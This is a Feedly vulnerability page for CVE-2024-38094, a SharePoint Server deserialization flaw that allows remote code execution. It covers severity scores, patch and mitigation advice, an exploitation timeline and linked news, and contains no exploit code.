FeedlyFeedly
CVEsCVEs
Threat IntelligenceThreat Intelligence
Threat IntelligenceThreat Intelligence
Log in
ChangelogChangelog
ChangelogChangelog
Log in
Log in
Start Free Trial
Start Free Trial
FeedlyFeedly
CVEsCVEs
Threat IntelligenceThreat Intelligence
Threat IntelligenceThreat Intelligence
Log in
ChangelogChangelog
ChangelogChangelog
Log in
Log in
Start Free Trial
Start Free Trial

Exploit
CVE-2024-38094

Deserialization of Untrusted Data (CWE-502)

Published: Jul 9, 2024

010
CVSS 7.2EPSS 0.05%High
CVE info copied to clipboard

Summary

A Remote Code Execution vulnerability exists in Microsoft SharePoint, related to the deserialization of untrusted data. This high-severity vulnerability affects Microsoft SharePoint Server versions 2019, Subscription Edition, and 2016 Enterprise. It has a CVSS v3.1 base score of 7.2, indicating a significant risk.

Impact

This vulnerability allows an attacker to execute arbitrary code on the affected SharePoint server with potentially severe consequences. The impact includes high risks to confidentiality, integrity, and availability. A successful exploit could result in the attacker gaining the same privileges as the compromised SharePoint application, potentially leading to full control of the affected system. The vulnerability requires network access and high privileges but no user interaction, making it particularly dangerous for network-accessible systems.

Exploitation

There is no evidence that a public proof-of-concept exists. The vulnerability is actively being exploited in the wild and was added to the CISA Known Exploited Vulnerability list. Its exploitation has been reported by various sources, including securityonline.info.

Patch

A patch is available. Microsoft released a security update on July 9, 2024, to address this vulnerability. It is crucial to apply this patch as soon as possible to mitigate the risk.

Mitigation

1. Apply the Microsoft security update immediately. 2. Implement network segmentation and restrict access to SharePoint servers. 3. Monitor SharePoint servers for suspicious activities. 4. Keep SharePoint and related software up to date with the latest security patches. 5. Implement the principle of least privilege for SharePoint user accounts and services. 6. If immediate patching is not possible, consider temporarily disabling or isolating affected SharePoint servers until the patch can be applied.

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Timeline

CVSS

A CVSS base score of 7.2 has been assigned.

Jul 9, 2024 at 5:05 PM / microsoft
CVE Assignment

NVD published the first details for CVE-2024-38094

Jul 9, 2024 at 5:15 PM
First Article

Feedly found the first article mentioning CVE-2024-38094. See article

Jul 9, 2024 at 5:17 PM / Vulners.com RSS Feed
CVSS Estimate

Feedly estimated the CVSS score as HIGH

Jul 9, 2024 at 5:36 PM
Trending

This CVE started to trend in security discussions

Jul 9, 2024 at 7:13 PM
Detection in Vulnerability Scanners

Detection for the vulnerability has been added to Nessus (202035)

Jul 9, 2024 at 11:15 PM
EPSS

EPSS Score was set to: 0.05% (Percentile: 19.6%)

Jul 10, 2024 at 10:14 AM
Exploitation in the Wild

Attacks in the wild have been reported by Cybersecurity News. See article

Jul 10, 2024 at 10:20 AM / Cybersecurity News
Trending

This CVE stopped trending in security discussions

Jul 12, 2024 at 8:36 PM
Static CVE Timeline Graph

Affected Systems

Microsoft/sharepoint_server
+null more

Proof Of Exploit

https://www.cisa.gov/known-exploited-vulnerabilities-catalog
+null more

Patches

Microsoft
+null more

Attack Patterns

CAPEC-586: Object Injection
+null more

References

Investigating a SharePoint Compromise: IR Tales from the Field
Cyber Security News - The Reddit of Infosec / 20d
Rapid7 began exploring suspicious activity that involved process executions tied to a Microsoft Exchange service account. Further analysis of authentication events from the domain controller indicated this malicious activity was sourced from a public-facing SharePoint server.
Investigating a SharePoint Compromise: IR Tales from the Field
IntSights Press Releases / 20d
Rapid7 began exploring suspicious activity that involved process executions tied to a Microsoft Exchange service account. Further analysis of authentication events from the domain controller indicated this malicious activity was sourced from a public-facing SharePoint server.
Investigating a SharePoint Compromise: IR Tales from the Field
Rapid7 Cybersecurity Blog / 20d
Rapid7 began exploring suspicious activity that involved process executions tied to a Microsoft Exchange service account. Further analysis of authentication events from the domain controller indicated this malicious activity was sourced from a public-facing SharePoint server.
See 1 more references

News

CISA: CISA Adds One Known Exploited Vulnerability to Catalog
RedPacket Security / 3h
BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice.
CISA: CISA Adds One Known Exploited Vulnerability to Catalog
RedPacket Security / 2d
BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice.
CISA: CISA Adds One Known Exploited Vulnerability to Catalog
RedPacket Security / 3d
BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice.
PAN-OS Firewall Vulnerability Under Active Exploitation – IoCs Released
Vumetric - Recent Security News Posts / 3d
Palo Alto Networks has released new indicators of compromise (IoCs) a day after the network security vendor confirmed that a new zero-day vulnerability impacting its PAN-OS firewall management interface has been actively exploited in the wild. To that end, the company said it observed malicious activity originating from below IP addresses and targeting PAN-OS management web interface IP
CISA: CISA Adds One Known Exploited Vulnerability to Catalog
RedPacket Security / 4d
BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice.
See 184 more articles and social media posts

CVSS V3.1

Attack Vector:Network
Attack Complexity:Low
Privileges Required:High
User Interaction:None
Scope:Unchanged
Confidentiality:High
Integrity:High
Availability Impact:High

Categories

CVSS 7.2(51562)CWE-502(1546)Microsoft(12100)

Be the first to know about critical vulnerabilities

Collect, analyze, and share vulnerability reports faster using AI

Feedly Threat Intelligence30-day free trial